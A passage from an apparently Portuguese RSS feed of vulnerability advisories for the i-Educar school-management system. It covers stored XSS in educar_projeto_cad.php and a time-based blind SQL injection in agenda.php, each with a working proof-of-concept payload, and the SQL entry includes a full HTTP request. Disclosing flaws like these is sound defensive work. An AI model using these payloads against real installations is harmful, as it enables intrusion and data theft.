        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9653</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9653/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9653/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9653-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_projeto_cadphp&amp;#34;&amp;gt;CVE-2025-9653: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_projeto_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9653&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9653&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_projeto_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_projeto_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9653-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_projeto_cadphp&amp;#34;&amp;gt;CVE-2025-9653: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_projeto_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9653&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9653&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_projeto_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_projeto_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9653/image.png&amp;#34;
	width=&amp;#34;679&amp;#34;
	height=&amp;#34;308&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9653/image_hu_ff92ad4a0e5a10c8.png 480w, /p/cve-2025-9653/image_hu_874ab00290986bd0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;220&amp;#34;
		data-flex-basis=&amp;#34;529px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9653/image-1.png&amp;#34;
	width=&amp;#34;649&amp;#34;
	height=&amp;#34;281&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9653/image-1_hu_767cf2003758e659.png 480w, /p/cve-2025-9653/image-1_hu_3ac528eecbe71f7b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;230&amp;#34;
		data-flex-basis=&amp;#34;554px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9653.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9653.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9531</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9531/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9531/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9531-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cod_agenda-do-endpoint-agendaphp&amp;#34;&amp;gt;CVE-2025-9531: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9531&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9531&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9531-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cod_agenda-do-endpoint-agendaphp&amp;#34;&amp;gt;CVE-2025-9531: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9531&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9531&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND 4698=(SELECT 4698 FROM PG_SLEEP(5)) AND &amp;amp;#39;xiCO&amp;amp;#39;=&amp;amp;#39;xiCO
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /intranet/agenda.php?cod_agenda=2%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO  HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost:8086
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Not)A;Brand&amp;amp;#34;;v=&amp;amp;#34;8&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;138&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=5AfYtvGRiuEgLBVbvksmwiNSnG75l4waXNMo1PEV
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;requisição-normal&amp;#34;&amp;gt;Requisição normal:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9531/image.png&amp;#34;
	width=&amp;#34;755&amp;#34;
